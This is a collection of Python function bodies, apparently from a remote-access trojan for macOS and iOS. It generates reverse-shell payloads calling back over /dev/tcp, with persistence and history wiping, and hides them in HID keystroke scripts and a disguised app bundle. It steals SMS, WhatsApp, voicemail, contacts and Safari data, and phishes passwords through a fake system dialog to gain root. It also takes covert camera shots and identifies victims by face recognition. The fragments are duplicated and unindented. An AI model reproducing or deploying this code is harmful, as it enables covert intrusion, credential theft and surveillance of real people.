def interact(self):
h.info_general("Listening on port {0}...".format(self.server.port))
h.info_general("Type \"help\" for commands")
while 1:
try:
input_data = raw_input(self.handle)
if not input_data:
continue
cmd = input_data.split()[0]
args = input_data[len(cmd):].strip()
if cmd == "interact":
self.interact_with_session(args)
elif cmd == "close":
self.close_session(args)
elif cmd == "sessions":
self.list_sessions()
elif cmd == "help":
self.show_commands()
elif cmd == "exit":
self.stop_server()
return
else:
h.info_error("Invalid Command: " + cmd)
except KeyboardInterrupt:
sys.stdout.write("\n")
self.stop_server()
return
def run(self, session, cmd_data):
if len(cmd_data['args'].split(" ")) < 2:
print(self.usage)
return
if cmd_data["args"][0] == "history":
file_name = "history.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file(
'/private/var/mobile/Library/Safari/' + file_name)
if data:
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
history_db_file = os.path.join('downloads', file_name)
hst = dbfparser.parse_safari_history_db(history_db_file)
dformat.print_formatted_history(hst)
elif cmd_data["args"][0] == "bookmarks":
file_name = "Bookmarks.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file(
'/private/var/mobile/Library/Safari/' + file_name)
if data:
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
bookmarks_db_file = os.path.join('downloads', file_name)
bok = dbfparser.parse_safari_bookmarks_db(bookmarks_db_file)
dformat.print_formatted_bookmarks(bok)
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
else:
paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
if len(paths) > 2:
print "Usage: upload <local_file> <remote_dir>"
return
local_dir = os.path.split(paths[0])[0]
local_file = os.path.split(paths[0])[1]
if len(paths) == 1:
remote_dir = "."
remote_file = local_file
else:
remote_dir = os.path.split(paths[1])[0]
if not remote_dir:
remote_dir = "."
remote_file = os.path.split(paths[1])[1]
if not remote_file:
remote_file = local_file
w = os.environ['OLDPWD']
os.chdir(w)
session.upload_file(paths[0], remote_dir, remote_file)
g = os.environ['HOME']
os.chdir(g + "/mouse")
h.info_general("File successfully uploaded!")
def run(self, session, cmd_data):
if not cmd_data['args']:
print(self.usage)
return
else:
paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
if len(paths) > 2:
print("USAGE")
return
local_dir = os.path.split(paths[0])[0]
local_file = os.path.split(paths[0])[1]
if len(paths) == 1:
remote_dir = "."
remote_file = local_file
else:
remote_dir = os.path.split(paths[1])[0]
if not remote_dir:
remote_dir = "."
remote_file = os.path.split(paths[1])[1]
if not remote_file:
remote_file = local_file
session.upload_file(paths[0], remote_dir, remote_file)
h.info_general("Done")
def disconnect(self, verbose):
self.conn.close()
if verbose:
h.info_general("Closing session")
time.sleep(0.5)
if self.server.multihandler.is_running:
del self.server.multihandler.sessions_id[self.id]
del self.server.multihandler.sessions_uid[self.uid]
def run(self,server):
while 1:
persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
else:
h.info_error("Unrecognized option!")
shell_command += "history -wc;killall Terminal"
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/teensy_macos") == False:
os.mkdir("payloads/teensy_macos")
payload_save_path = "payloads/teensy_macos/teensy_macos.ino"
payload = """\
#include "Keyboard.h"
const int LED = 13;
void setup() {
pinMode(LED, OUTPUT);
Serial.begin(9600);
delay(1000); //delay to establish connection
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(200);
Keyboard.print("terminal");
delay(1000);
keyEnter();
delay(1000);
Keyboard.print(\""""+shell_command+"""\");
keyEnter();
}
void keyEnter() {
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
//release
Keyboard.set_key1(0);
Keyboard.send_now();
}
void loop() {
digitalWrite(LED, HIGH);
delay(100);
digitalWrite(LED, LOW);
delay(100);
}"""
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + payload_save_path)
def run(self, session, cmd_data):
if cmd_data['args'] == "install":
h.info_general("Installing...")
elif cmd_data['args'] == "uninstall":
h.info_general("Uninstalling...")
else:
print "Usage: persistence install|uninstall"
return
session.send_command(cmd_data)
def close_session(self, session_number):
if not session_number:
print "Usage: close <session_number>"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Closing session ' + session_number + '...')
except:
h.info_error("Invalid session number!")
def run(self, session, cmd_data):
if cmd_data['args'] == "install":
h.info_general("Installing...")
elif cmd_data['args'] == "uninstall":
h.info_general("Uninstalling...")
else:
print self.usage
return
result = session.send_command(cmd_data)
if result:
h.info_error(result)
def close_session(self,session_number):
if not session_number:
print "Usage: Terminate + [Session Number]"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Terminating Session ' + session_number)
except Exception as e:
print e
h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
def close_session(self, session_number):
if not session_number:
print "Usage: close (session number)"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Closing session ' + session_number)
except Exception as e:
print e
h.info_error("Invalid Session")
def run(self, session, cmd_data):
file_name = "voicemail.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/private/var/mobile/Library/Voicemail/' +
file_name)
if data and session.vm_fetched == False:
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
session.vm_fetched = True
voicemail_db_file = os.path.join('downloads', file_name)
vm = dbfparser.parse_voicemail_db(voicemail_db_file)
dformat.print_formatted_voicemails(vm)
def background_listener(self):
self.server.is_multi = True
self.is_running = True
id_number = 1
while 1:
if self.is_running:
session_infos = self.server.listen_for_stager()
if session_infos:
session, hostAddress = session_infos
if session.uid in self.sessions_uid.keys():
if self.sessions_uid[session.uid].needs_refresh:
self.update_session(self.sessions_uid[session.uid],
session)
continue
else:
self.sessions_uid[session.uid] = session
self.sessions_id[id_number] = session
self.new_session_id = id_number
session.id = id_number
victim = {}
victim_info = {}
# Construct victims info dict
victim['session_id'] = id_number
victim['ip_address'] = hostAddress
victim_info['username'] = session.username
victim_info['hostname'] = session.hostname
victim_info['type'] = session.type
victim['victim_info'] = victim_info
victim['identified'] = False
# Append victim into victim list
self.victims['victims'].append(victim)
self.victims['total_victims'] += 1
id_number += 1
sys.stdout.write(
"\n{0}[*]{2} Session {1} opened{2}\n{3}".format(
h.COLOR_INFO, str(session.id), h.WHITE,
self.handle))
sys.stdout.flush()
# Whether this victim is identified
# If identified, add this victim into identified victim list
self.identify_victim(session.id)
# Notify that victims have been changed
self.victims_modify = True
# self.init_interact_with_session()
else:
h.info_general("Exit the listener")
return
def run(self, session, cmd_data):
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error(result['error'])
return
elif 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
file_name = "screenshot_{0}.jpg".format(int(time.time()))
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self, session, cmd_data):
password = getpass.getpass("Password: "******"\\", "\\\\").replace("'", "\\'")
cmd_data['cmd'] = "eggsu"
result = session.send_command(cmd_data)
if "root" in result:
h.info_general("Root Granted")
time.sleep(0.2)
h.info_general("Escalating Privileges")
if session.server.is_multi == False:
session.server.update_session(session)
else:
session.needs_refresh = True
else:
print "failed getting root"
def run(self,session,cmd_data):
payload = """
tell application "Finder"
activate
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if mypass > "" then exit repeat
end try
end repeat
try
do shell script "echo " & quoted form of mypass
end try
end tell
"""
cmd_data.update({"cmd":"applescript","args":payload})
password = session.send_command(cmd_data).strip()
#display response
print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE
#prompt for root
tryroot = raw_input("Would you like to try for root? (Y/n) ")
tryroot = tryroot if tryroot else "y"
if tryroot.lower() != "y":
return ""
#TODO: I am so lazy, probably should use the su command
password = password.replace("\\","\\\\").replace("'","\\'")
cmd_data.update({"cmd":"eggsu","args":password})
result = session.send_command(cmd_data)
if "root" in result:
h.info_general("Root Granted!")
time.sleep(0.2)
h.info_general("Escalating Privileges...")
if session.server.is_multi == False:
session.server.update_session(session)
else:
session.needs_refresh = True
else:
h.info_error("Failed getting root!")
return ""
def identify_victim(self, session_id):
if session_id < 1:
h.info_error("Invalid Session")
return False
try:
idx = session_id - 1
victim = self.victims['victims'][idx]
# if already identified, return True
if victim['identified']:
return True
file_name = self.sessions_id[session_id].init_interact()
response = faceRec(file_name)
response = json.loads(response)
h.info_general("Face Rec Result:")
print(response)
if response['status'] == "Ok":
print(response['faceId'])
faceid = response['faceId']
if faceid in self.faceid_mapping['FaceToPerson']:
person_name = self.faceid_mapping['FaceToPerson'][faceid]
for person in self.person_db['Person']:
if person['name'] == person_name:
identified_victim = {}
identified_victim['session_id'] = session_id
identified_victim['profile'] = person
self.identified_victims[
'identified_victims'].append(identified_victim)
self.identified_victims[
'total_identified_victims'] += 1
break
victim['identified'] = True
return True
else:
print("Person not in Database")
return False
else:
print("No Face Rec result")
return False
except:
h.info_error("Person cannot be recognized")
return False
def run(self, server):
while 1:
name = raw_input(h.info_general_raw("Application Name> "))
icon = raw_input(h.info_general_raw("Application Icon> "))
persistence = raw_input(
h.info_general_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
else:
h.info_error("invalid option: " + persistence)
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/macos_application") == False:
os.mkdir("payloads/macos_application")
os.system("""
cp -r resources/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/""" +
name + """.app
mv """ + icon + """ payloads/macos_application/""" + name +
""".app/Contents/Resources/payload.icns
""")
payload_save_path = "payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh"
sas = "payloads/macos_application/" + name + ".app"
payload = """\
#! /usr/bin/env bash
""" + shell_command + """
"""
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + sas)
os.system("chmod +x payloads/macos_application/" + name +
".app/Contents/MacOS/payload.sh")
def get_all_images(self, victim_name):
if not victim_name:
h.info_error("Invalid victim name")
return None
try:
try:
victim_db_path = "./DB/"
victims_folders = os.listdir(victim_db_path)
if victim_name not in victims_folders:
h.info_general("Unidentified victim")
return None
except:
return None
# Had found the victim folder, get all image files
if victim_name:
try:
personal_db_image_path = "DB/" + victim_name + "/Images/"
if not os.path.exists(personal_db_image_path):
os.makedirs(personal_db_image_path)
images = [
f for f in os.listdir(personal_db_image_path)
if f.endswith('.jpg')
]
total_images = len(images)
results = {}
results['images'] = images
results['total_images'] = total_images
results['image_path'] = personal_db_image_path
return results
except:
h.info_error("Fetching Images Error")
return None
else:
h.info_general("Invalid victim name")
return None
except:
h.info_error("Error in get the images")
return None
def run(self, server):
while 1:
persistence = raw_input(
h.info_question_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $(bash &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
shell_clean = "history -wc;killall Terminal"
break
elif persistence == "n" or not persistence:
shell_command = "bash &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
shell_clean = "history -wc;killall Terminal"
break
else:
h.info_error("Unrecognized option!")
shell_command += "history -wc;killall Terminal"
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/rubber_duck") == False:
os.mkdir("payloads/rubber_duck")
payload_save_path = "payloads/rubber_duck/payload.txt"
payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + payload_save_path)
def run(self,session,cmd_data):
if not cmd_data['args'] or (cmd_data['args'] != "front" and cmd_data['args'] != "back"):
print self.usage
return
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
if cmd_data['args'] == False:
file_name = "back_{0}.jpg".format(int(time.time()))
else:
file_name = "front_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads',file_name),'w')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
else:
if 'error' in response:
h.info_error(response['error'])
else:
h.info_error("Unexpected error")
except Exception as e:
print e
def init_interact_with_session(self):
if self.new_session_id < 1:
h.info_error("Invalid Session")
return
try:
file_name = self.sessions_id[self.new_session_id].init_interact()
response = faceRec(file_name)
response = json.loads(response)
h.info_general("Face Rec Result:")
print(response)
if response['status'] == "Ok":
print(response['faceId'])
faceid = response['faceId']
else:
print("no data match")
faceid = ""
if faceid in self.faceid_mapping['FaceToPerson']:
person_name = self.faceid_mapping['FaceToPerson'][faceid]
for person in self.person_db['Person']:
if person['name'] == person_name:
self.victims[self.new_session_id] = person
self.victims_modify = True
except:
h.info_error("Person cannot be recognized")
def run(self, session, cmd_data):
file_name = "notes.sqlite"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/var/mobile/Library/Notes/' + file_name)
if data:
# save to downloads
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self, session, cmd_data):
file_name = "sms.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/var/mobile/Library/SMS/' + file_name)
if data:
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
session.sms_fetched = True
def run(self, session, cmd_data):
file_name = "AddressBook.sqlitedb"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/var/mobile/Library/AddressBook/' +
file_name)
if data:
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self, session, cmd_data):
h.info_general("Uploading dylib 1/2...")
session.upload_file("resources/espro.dylib",
"/Library/MobileSubstrate/DynamicLibraries",
".espl.dylib")
h.info_general("Uploading plist 2/2...")
session.upload_file("resources/espro.plist",
"/Library/MobileSubstrate/DynamicLibraries",
".espl.plist")
h.info_general("Respring...")
time.sleep(1)
session.send_command({"cmd": "killall", "args": "SpringBoard"})
def run(self, session, cmd_data):
file_name = "ChatStorage.sqlite"
h.info_general(
"Downloading {0}... (this may take a while)".format(file_name))
data = session.download_file(
'/private/var/mobile/Containers/Shared/AppGroup/D135448A-EDA9-417C-B6BE-53B0F614C3E2/'
+ file_name)
if data:
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
session.wa_fetched = True
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
file_name = os.path.split(cmd_data['args'])[-1]
h.info_general("Downloading {0}".format(file_name))
data = session.download_file(cmd_data['args'])
if data:
# save to downloads
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
def run(self, session, cmd_data):
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
file_name = "isight_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'wb')
f.write(data)
f.close()
h.info_general("Saved to ./downloads/{0}".format(file_name))
except Exception as e:
print(e)
def save_images(self, session_id, filename):
if session_id < 1:
h.info_error("Invalid Session")
return
try:
idx = session_id - 1
victim = self.victims['victims'][idx]
# Only save the image for identified victim
if not victim['identified']:
h.info_general("Session has not been identified")
return
victim_name = None
identified_victims = self.identified_victims['identified_victims']
for victim in identified_victims:
if victim['session_id'] == session_id:
victim_name = victim['profile']['name']
break
# Had found the victim, save the image in personal db
if victim_name:
try:
image_path = "./DB/pictures/" + filename
personal_db_image_path = "./DB/" + victim_name + "/Images/"
if not os.path.exists(personal_db_image_path):
os.makedirs(personal_db_image_path)
image = Image.open(image_path)
image.save(personal_db_image_path + filename,
optimize=True,
quality=10)
h.info_general("Saved to" + personal_db_image_path +
filename)
return
except:
h.info_error("Image save path error")
return
else:
h.info_general("Haven't found the target victim")
return
except:
h.info_error("Error in Saving the image")
return